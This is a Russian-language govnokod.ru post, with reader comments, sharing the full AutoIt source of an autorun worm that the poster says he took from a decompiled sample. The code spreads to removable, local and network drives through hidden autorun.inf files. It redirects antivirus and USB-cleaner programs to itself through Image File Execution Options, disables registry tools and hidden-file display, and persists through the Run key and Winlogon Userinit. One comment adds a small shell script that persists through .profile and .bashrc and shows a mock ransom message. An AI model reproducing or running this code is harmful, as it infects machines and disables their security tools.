Говнокод #20385 — VisualBasic

Говнокод: по колено в коде.

Нашли или выдавили из себя код, который нельзя назвать нормальным, на который без улыбки не взглянешь? Не торопитесь его удалять или рефакторить, — запостите его на говнокод.ру, посмеёмся вместе!

VisualBasic / Говнокод #20385

−70

;Autorun-червь на Autoit. Инфицирует сменные и локальные диски. Не вредоносный.
;Только для просмотра. Автор топика не несет ответственности за Ваши действия.

AutoItSetOption("TrayIconHide", 1)

Func AUTORUN_INF()
        If FileExists($VAR[$I] & "\autorun.inf") Then
                $FILE = FileOpen($VAR[$I] & "\autorun.inf", 0)
                $STR = FileReadLine($FILE, 2)
                FileClose($FILE)
                If $STR <> ("open=System_Cache\locale.exe") Then
                        FileSetAttrib($VAR[$I] & "\autorun.inf", "-HSR+A")
                        $AUT = FileOpen($VAR[$I] & "\autorun.inf", 10)
                        FileWrite($AUT, "[autorun]" & @CRLF)
                        FileWrite($AUT, "open=System_Cache\locale.exe" & @CRLF)
                        FileWrite($AUT, "shell\open=0B:@KBL(&O)" & @CRLF)
                        FileWrite($AUT, "shell\open\Command=System_Cache\locale.exe" & @CRLF)
                        FileWrite($AUT, "shell\open\Default=1" & @CRLF)
                        FileWrite($AUT, "shell\explore=@>2>4=8:" & @CRLF)
                        FileWrite($AUT, "shell\explore\Command=System_Cache\locale.exe")
                        FileClose($AUT)
                        FileSetAttrib($VAR[$I] & "\autorun.inf", "+HSR")
                Else
                EndIf
        Else
                $FILE = FileOpen($VAR[$I] & "\autorun.inf", 10)
                FileSetAttrib($VAR[$I] & "\autorun.inf", "+HSR")
                FileWrite($FILE, "[autorun]" & @CRLF)
                FileWrite($FILE, "open=System_Cache\locale.exe" & @CRLF)
                FileWrite($FILE, "shell\open=0B:@KBL(&O)" & @CRLF)
                FileWrite($FILE, "shell\open\Command=System_Cache\locale.exe" & @CRLF)
                FileWrite($FILE, "shell\open\Default=1" & @CRLF)
                FileWrite($FILE, "shell\explore=@>2>4=8:" & @CRLF)
                FileWrite($FILE, "shell\explore\Command=System_Cache\locale.exe")
                FileClose($FILE)
                FileSetAttrib($VAR[$I] & "\autorun.inf", "+HSR")
        EndIf
EndFunc

$H = 1
$START = @AutoItExe
If $START <> (@SystemDir & "\locale.exe") Then
        $DRIVE = StringMid($START, 1, 3)
        $VAL = ShellExecute($DRIVE)
Else
EndIf
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMon.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetector.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\anti_autorun.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\USBCleaner.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitor.exe", "Debugger", "REG_SZ", @SystemDir & "\locale.exe")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", "REG_DWORD", "2")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoFolderOptions", "REG_DWORD", "1")
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "AtiMonitor", "REG_SZ", @SystemDir & "\locale.exe")
If ProcessExists("sirwnmi.exe") And ("sudlces.exe") Then
        ProcessClose("sirwnmi.exe")
        ProcessClose("sudlces.exe")
        If FileExists(@CommonFilesDir & "\System\" & "sudlces.exe") Then
                FileSetAttrib(@CommonFilesDir & "\System\" & "sudlces.exe", "-HSR+A")
                FileDelete(@CommonFilesDir & "\System\" & "sudlces.exe")
        EndIf
        If FileExists(@CommonFilesDir & "\Microsoft Shared\" & "sirwnmi.exe") Then
                FileSetAttrib(@CommonFilesDir & "\Microsoft Shared\" & "sirwnmi.exe", "-HSR+A")
                FileDelete(@CommonFilesDir & "\Microsoft Shared\" & "sirwnmi.exe")
        EndIf
EndIf
If FileExists(@SystemDir & "\avpo.exe") Then
        FileSetAttrib(@SystemDir & "\avpo.exe", "-HSR+A")
        FileDelete(@SystemDir & "\avpo.exe")
EndIf
If FileExists(@SystemDir & "\amvo.exe") Then
        FileSetAttrib(@SystemDir & "\amvo.exe", "-HSR+A")
        FileDelete(@SystemDir & "\amvo.exe")
EndIf
If ProcessExists("locale.exe") Then
        $X = 0
        $LIST = ProcessList("locale.exe")
        For $I = 1 To $LIST[0][0]
                $X = $X + 1
        Next
        If $X > 1 Then
                Exit
        EndIf
EndIf
While $H = 1
        $VAR = DriveGetDrive("REMOVABLE")
        If Not @error Then
                For $I = 1 To $VAR[0]
                        If $VAR[$I] <> "A:"  Then
                                $PUT = @AutoItExe
                                FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8)
                                FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                AUTORUN_INF()
                        Else
                        EndIf

Запостил:

fajes_rown, 15 Июля 2016

Комментарии (21) RSS

fajes_rown 15.07.2016 22:44 # −2

While $H = 1
        $VAR = DriveGetDrive("REMOVABLE")
        If Not @error Then
                For $I = 1 To $VAR[0]
                        If $VAR[$I] <> "A:"  Then
                                $PUT = @AutoItExe
                                FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8)
                                FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                AUTORUN_INF()
                        Else
                        EndIf
                Next
        EndIf
        $VAR = DriveGetDrive("Fixed")
        If Not @error Then
                For $I = 1 To $VAR[0]
                        If $VAR[$I] <> "A:"  Then
                                $PUT = @AutoItExe
                                FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8)
                                FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                AUTORUN_INF()
                        Else
                        EndIf
                Next
        EndIf

Ответить

fajes_rown 15.07.2016 22:44 # −2

$VAR = DriveGetDrive("NETWORK")
        If Not @error Then
                For $I = 1 To $VAR[0]
                        If $VAR[$I] <> "A:"  Then
                                $PUT = @AutoItExe
                                If FileCopy($PUT, $VAR[$I] & "\System_Cache\locale.exe", 8) = 1 Then
                                        FileSetAttrib($VAR[$I] & "\System_Cache", "+HSR", 1)
                                        FileCopy($PUT, "C:\windows\system32\ntfsours.exe", 8)
                                        FileCopy($PUT, "C:\windows\system32\locale.exe", 8)
                                        FileSetAttrib("C:\windows\system32\ntfsours.exe", "+HSR")
                                        FileSetAttrib("C:\windows\system32\locale.exe", "+HSR")
                                Else
                                EndIf
                                AUTORUN_INF()
                        Else
                        EndIf
                Next
        EndIf
        $USERINIT = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit")
        If $USERINIT <> @SystemDir & "\userinit.exe," & @SystemDir & "\ntfsours.exe,"  Then
                RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Userinit", "REG_SZ", @SystemDir & "\userinit.exe," & @SystemDir & "\ntfsours.exe,")
        EndIf
        If ProcessExists("ntfsours.exe") Then
                ProcessClose("ntfsours.exe")
        EndIf
        Sleep(30000)
WEnd

Ответить

fajes_rown 15.07.2016 22:47 # 0

Надо же, какая у Вас умная подсветка. Всё как полагается подсвечивает.
Ответить
- Soul_re@ver 15.07.2016 23:06 # +3
  
  Интеллектуальная подсветка — чтобы сэкономить ресурсы она не подсвечивает что не нужно. Васик не_нужен.
  Ответить
Sim_salapim 15.07.2016 23:45 # +3

>>Func AUTORUN_INF()
If FileExists($VAR[$I] & "\autorun.inf") Then

Очень странно. $var упоминается только на строке #087, и то как обычная локальная переменная, здесь же используется как неявный аргумент. Как это возможно?
Ответить
- fajes_rown 17.07.2016 01:16 # 0
  
  Оказывается, возможно. Этот код нормально компилируется и работает, ещё бы.
  Достал из декомпилированного червя.
  Ответить
- CTEPTOP 30.08.2016 20:00 # 0
  Переменная оказывается в зоне видимости процедуры и становится как бы глобальной.
  В VBS то же самое.
  
  sub lol() msgbox param end sub dim param param="test" lol()
  
  Это вовсе не обращение из одного метода к локальной переменной другого.
  Ответить
guest 16.07.2016 01:26 # 0

Stertor, ты?
Ответить
- CTEPTOP 30.08.2016 20:02 # 0
  
  Я.
  Ответить
  - void_main 30.08.2016 20:19 # 0
    
    Стоит отметить, что, если ехать в секс-тур по Камеруну, то языкового барьера между мною и тамошними шоколадными зайцами не возникнет, ибо говорят там по-английски; а уж я с мало-мальским знанием английского языка завсегда смогу прокричать "Deeper, deeper!", верно?
    Ответить
  - 1024-- 30.08.2016 20:29 # 0
    
    А Sim_salapim - Вы?
    Ответить
    - guest 30.08.2016 20:32 # 0
      
      Да.
      Ответить
guest 16.07.2016 06:26 # 0

Напиши вирус на линукс, ну напиши, а то все на винду и винду
Ответить
- bormand 16.07.2016 07:50 # 0
  
  Дык есть они. Просто обычно это какие-нибудь руткиты, а не детские игрушки типа авторанцев.
  Ответить
  - guest 16.07.2016 07:58 # 0
    
    Зочем мне написаные, я хочу от него
    Ответить
    - bormand 16.07.2016 08:33 # +2
      
      #!/bin/sh ME="$HOME/.test" if [ ! -f "$ME" ]; then cp $0 "$ME" chmod +x "$ME" echo "$ME" >>"$HOME/.profile" echo "$ME" >>"$HOME/.bashrc" fi if [ "$0" != "$ME" ]; then exit 0; fi echo "Your sosnoole is locked. Please send 0.1BTC to my wallet to unlock it." while [ true ]; do sleep 1; done
      Ответить
      - guest 16.07.2016 10:35 # 0
        
        Я хочу от него, на Васике, а не на ебаше
        Ответить
    - guest 16.07.2016 11:22 # +1
      
      > я хочу от него
      Сына?
      Ответить
- 3_14dar 16.07.2016 23:47 # 0
  
  Наберите больше 1% и будут вам вирусы. Там где у питуха >1% так и есть: ембеддед - нихуевый такой ботнет на рутерах, серваки - руткиты. А то следующий анон свою ос напишет и будет бегать и требовать и ему вирус написать.
  Ответить
  - 3_dar 17.07.2016 00:06 # 0
    
    Больше 1% юзеров?
    Ответить
- fajes_rown 17.07.2016 01:15 # 0
  
  Я не пишу вирусы, готовый сорец запостил.
  Ответить

Говнокод: по колено в коде.

VisualBasic / Говнокод #20385

Комментарии (21) RSS

Добавить комментарий